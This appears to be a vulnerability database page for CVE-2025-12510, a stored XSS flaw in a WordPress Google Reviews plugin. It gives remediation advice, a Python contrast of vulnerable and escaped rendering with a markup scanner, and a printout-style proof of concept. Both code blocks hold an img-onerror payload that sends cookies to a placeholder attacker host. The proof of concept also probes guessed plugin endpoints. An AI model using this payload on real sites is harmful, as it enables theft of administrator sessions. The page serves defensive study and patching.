Security Vulnerability Report
CVE-2025-12510 CVSS 7.2 HIGH

CVE-2025-12510

Published: 2025-12-06 04:15:47
Last Modified: 2026-04-15 00:35:42

Description

The Widgets for Google Reviews plugin for WordPress is vulnerable to Stored Cross-Site Scripting in all versions up to, and including, 13.2.4 due to insufficient input sanitization and output escaping on Google Reviews data imported by the plugin. This makes it possible for unauthenticated attackers to inject arbitrary web scripts that will execute in the admin panel (and potentially on the frontend) whenever a user accesses imported reviews, provided they can add a malicious review to a Google Place that is connected to the vulnerable site.

Practical reading: the injection point is not the WordPress site but the Google Place listing it syncs from. Anyone with a Google account who can leave a review on that listing can plant the payload in the review text or reviewer name; the plugin's import copies it into the WordPress database, and it is rendered unescaped whenever an administrator views the imported reviews. No request carrying the payload ever reaches the WordPress site, so a WAF in front of it does not see the attack, which is also why the vector is scored PR:N/UI:N with a changed scope (S:C). Remediation is to update the plugin to a release later than 13.2.4 (the fixing changeset is listed in the references) and then to inspect reviews that were already imported: a payload stored before the update is only harmless if the fixed version escapes it on output, so check the stored data rather than assuming the update alone is enough.
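As an added illustration (not the advisory's text or the plugin's code), the following Python models the bug class described above: review text and reviewer names arrive from the Google Places import, are trusted as plain text, and are interpolated into admin-page HTML without escaping. `render_review_vulnerable` reproduces that mistake, `render_review_hardened` escapes every imported field at output time (the equivalent of WordPress `esc_html()`; the plugin's actual fix is in the referenced changeset and may differ), and `scan_imported_reviews` is a triage helper for checking reviews already sitting in the database. The review records are constructed sample data and `attacker.example` is a placeholder host.

```python
"""Added example, not part of the advisory or the plugin's code.

Models the bug class behind CVE-2025-12510: review data fetched from a
trusted third-party feed (Google Places) is written into an admin page
without escaping. The review records are constructed sample data; the
render functions are illustrative stand-ins for the plugin's PHP templating,
with the hardened form mirroring what esc_html()/htmlspecialchars() do.
"""
import html
import re

# Constructed sample of what an import job might hand to the renderer.
# The third record carries the kind of payload the advisory describes.
SAMPLE_REVIEWS = [
    {"author": "Alice", "rating": 5, "text": "Friendly staff, quick service."},
    {"author": "Bob", "rating": 4, "text": "Good value & nice location."},
    {
        "author": "Happy Customer<script>alert(1)</script>",
        "rating": 5,
        "text": 'Great! <img src=x onerror="fetch(\'https://attacker.example/steal?c=\'+document.cookie)">',
    },
]


def render_review_vulnerable(review):
    """Interpolates third-party data straight into HTML (the flaw)."""
    return (
        f'<div class="review"><b>{review["author"]}</b> '
        f'({review["rating"]}/5): {review["text"]}</div>'
    )


def render_review_hardened(review):
    """Escapes every externally sourced field at output time."""
    return (
        f'<div class="review"><b>{html.escape(review["author"])}</b> '
        f'({int(review["rating"])}/5): {html.escape(review["text"])}</div>'
    )


# Markup that has no business in a plain-text review: tags, inline event
# handlers and javascript: URLs.
_SUSPICIOUS = re.compile(
    r"<\s*/?\s*[a-z][a-z0-9]*|on[a-z]+\s*=|javascript\s*:", re.IGNORECASE
)


def scan_imported_reviews(reviews):
    """Triage helper: return the indexes of reviews that contain markup.

    Run this over whatever the site has already imported (the reviews stored
    in the WordPress database) to learn whether a payload is already present.
    It is a detection step, not a fix; the fix is escaping at output and
    updating the plugin.
    """
    hits = []
    for i, review in enumerate(reviews):
        for field in ("author", "text"):
            if _SUSPICIOUS.search(str(review.get(field, ""))):
                hits.append(i)
                break
    return hits


if __name__ == "__main__":
    for r in SAMPLE_REVIEWS:
        print("vulnerable:", render_review_vulnerable(r))
        print("hardened:  ", render_review_hardened(r))
    print("suspicious review indexes:", scan_imported_reviews(SAMPLE_REVIEWS))
```

Escaping at output is the right default for the admin page, where a review is never meant to carry markup. If a frontend widget intentionally allows limited formatting, the WordPress equivalent is an allowlist filter such as `wp_kses()` rather than trusting the feed; the scanner above will flag any review that contains tags at all, which is the conservative choice for triage after an incident.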

CVSS Details

CVSS Score
7.2
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N

Configurations (Affected Products)

No CPE configuration data is available from NVD for this entry (vulnStatus: Deferred).

Affected product: Widgets for Google Reviews (WordPress plugin) <= 13.2.4

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-12510 PoC - Stored XSS in Widgets for Google Reviews Plugin
# This PoC demonstrates the XSS vulnerability via Google Places injection.
# Steps 1-3 walk through the attack path and print what happens at each stage;
# they send no traffic. Google has no public API for posting a review, so step 1
# is done by hand with a Google account that can review the connected Place.
import requests

# Configuration
TARGET_WORDPRESS_URL = "http://target-wordpress-site.com"
GOOGLE_PLACE_ID = "ChIJN1t_tDeuEmsRUsoyG83frY4"  # Target's Google Place ID
ATTACKER_CONTROLLED_SERVER = "https://attacker-controlled.com"


# Step 1: Inject malicious review to Google Place
def inject_malicious_google_review():
    """
    Attacker posts a malicious review to the Google Place connected to the
    target site. The review contains an XSS payload that will be imported by
    the vulnerable plugin.
    """
    # Exfiltrates the viewer's cookies and current URL to the attacker's server.
    xss_payload = (
        '<img src=x onerror="'
        f"fetch('{ATTACKER_CONTROLLED_SERVER}/steal?cookie=' + encodeURIComponent(document.cookie)"
        " + '&url=' + encodeURIComponent(location.href))"
        '">'
    )
    # Review content as it would be entered on Google Maps (requires a valid
    # Google account). Both the review text and the reviewer name get imported.
    google_review_data = {
        "place_id": GOOGLE_PLACE_ID,
        "rating": 5,
        "review_text": f"Great service! {xss_payload}",
        "reviewer_name": "Happy Customer<script>console.log('XSS triggered')</script>",
    }
    print("[+] Step 1: Injecting malicious review to Google Place")
    print(f"    Payload: {xss_payload}")
    print(f"    Review data: {google_review_data}")
    print("[+] Malicious review submitted to Google Places")
    return True


# Step 2: Trigger plugin to import the malicious review
def trigger_plugin_import():
    """
    When the site admin accesses the plugin settings or the plugin's scheduled
    sync runs, the malicious review gets imported into the WordPress database.
    """
    print("[+] Step 2: Plugin imports malicious review from Google")
    print("[+] Malicious XSS payload stored in WordPress database")
    return True


# Step 3: XSS triggers when admin visits plugin admin page
def xss_exploitation():
    """
    When the admin visits the WordPress admin panel (specifically plugin pages),
    the stored XSS payload executes in the browser context.
    """
    print("[+] Step 3: Admin visits WordPress admin panel")
    print("[+] XSS payload executes - Admin cookies stolen")
    print(f"[+] Attacker receives: {ATTACKER_CONTROLLED_SERVER}/steal?cookie=[ADMIN_SESSION]")
    return True


# Alternative: Direct plugin API exploitation (if a known endpoint exists)
def test_plugin_api():
    """
    Some versions may have direct API endpoints for review import. This tests
    whether the plugin exposes any reachable endpoints. The two paths below are
    guesses and are not confirmed by the advisory references; a 200 only means
    the route answered, not that it is vulnerable.
    """
    candidate_endpoints = [
        f"{TARGET_WORDPRESS_URL}/wp-json/trustindex/v1/import",
        f"{TARGET_WORDPRESS_URL}/wp-admin/admin-ajax.php?action=ti_import_reviews",
    ]
    found = []
    for endpoint in candidate_endpoints:
        try:
            response = requests.get(endpoint, timeout=10)
            if response.status_code == 200:
                print(f"[+] Found accessible endpoint: {endpoint}")
                found.append(endpoint)
        except requests.RequestException:
            pass
    return found


if __name__ == "__main__":
    print("=" * 60)
    print("CVE-2025-12510 - Stored XSS in Google Reviews Plugin")
    print("=" * 60)
    # Note: Actual exploitation requires a Google account with the ability to
    # post reviews to the Google Place connected to the target WordPress site.
    inject_malicious_google_review()
    trigger_plugin_import()
    xss_exploitation()
    print("\n[!] Note: This PoC demonstrates the attack methodology.")
    print("[!] Actual exploitation requires a Google Places listing connected to the target site.")

References

Vulnerable code (tag 13.2.1):
https://plugins.trac.wordpress.org/browser/wp-reviews-plugin-for-google/tags/13.2.1/trustindex-plugin.class.php#L5907
https://plugins.trac.wordpress.org/browser/wp-reviews-plugin-for-google/tags/13.2.1/trustindex-plugin.class.php#L5932

Fixing changeset:
https://plugins.trac.wordpress.org/changeset/3399469/wp-reviews-plugin-for-google/trunk/trustindex-plugin.class.php?old=3398822&old_path=wp-reviews-plugin-for-google%2Ftrunk%2Ftrustindex-plugin.class.php

Wordfence advisory:
https://www.wordfence.com/threat-intel/vulnerabilities/id/7adf3335-ed13-43f4-a5f3-05e89be44d2d?source=cve

Raw JSON Data

JSON
{
  "cve": {
    "id": "CVE-2025-12510",
    "sourceIdentifier": "[email protected]",
    "published": "2025-12-06T04:15:47.183",
    "lastModified": "2026-04-15T00:35:42.020",
    "vulnStatus": "Deferred",
    "cveTags": [],
    "descriptions": [
      {
        "lang": "en",
        "value": "The Widgets for Google Reviews plugin for WordPress is vulnerable to Stored Cross-Site Scripting in all versions up to, and including, 13.2.4 due to insufficient input sanitization and output escaping on Google Reviews data imported by the plugin. This makes it possible for unauthenticated attackers to inject arbitrary web scripts that will execute in the admin panel (and potentially on the frontend) whenever a user accesses imported reviews, granted they can add a malicious review to a Google Place that is connected to the vulnerable site."
      }
    ],
    "metrics": {
      "cvssMetricV31": [
        {
          "source": "[email protected]",
          "type": "Secondary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N",
            "baseScore": 7.2,
            "baseSeverity": "HIGH",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "privilegesRequired": "NONE",
            "userInteraction": "NONE",
            "scope": "CHANGED",
            "confidentialityImpact": "LOW",
            "integrityImpact": "LOW",
            "availabilityImpact": "NONE"
          },
          "exploitabilityScore": 3.9,
          "impactScore": 2.7
        }
      ]
    },
    "weaknesses": [
      {
        "source": "[email protected]",
        "type": "Secondary",
        "description": [
          {"lang": "en", "value": "CWE-79"}
        ]
      }
    ],
    "references": [
      {"url": "https://plugins.trac.wordpress.org/browser/wp-reviews-plugin-for-google/tags/13.2.1/trustindex-plugin.class.php#L5907", "source": "[email protected]"},
      {"url": "https://plugins.trac.wordpress.org/browser/wp-reviews-plugin-for-google/tags/13.2.1/trustindex-plugin.class.php#L5932", "source": "[email protected]"},
      {"url": "https://plugins.trac.wordpress.org/changeset/3399469/wp-reviews-plugin-for-google/trunk/trustindex-plugin.class.php?old=3398822&old_path=wp-reviews-plugin-for-google%2Ftrunk%2Ftrustindex-plugin.class.php", "source": "[email protected]"},
      {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/7adf3335-ed13-43f4-a5f3-05e89be44d2d?source=cve", "source": "[email protected]"}
    ]
  }
}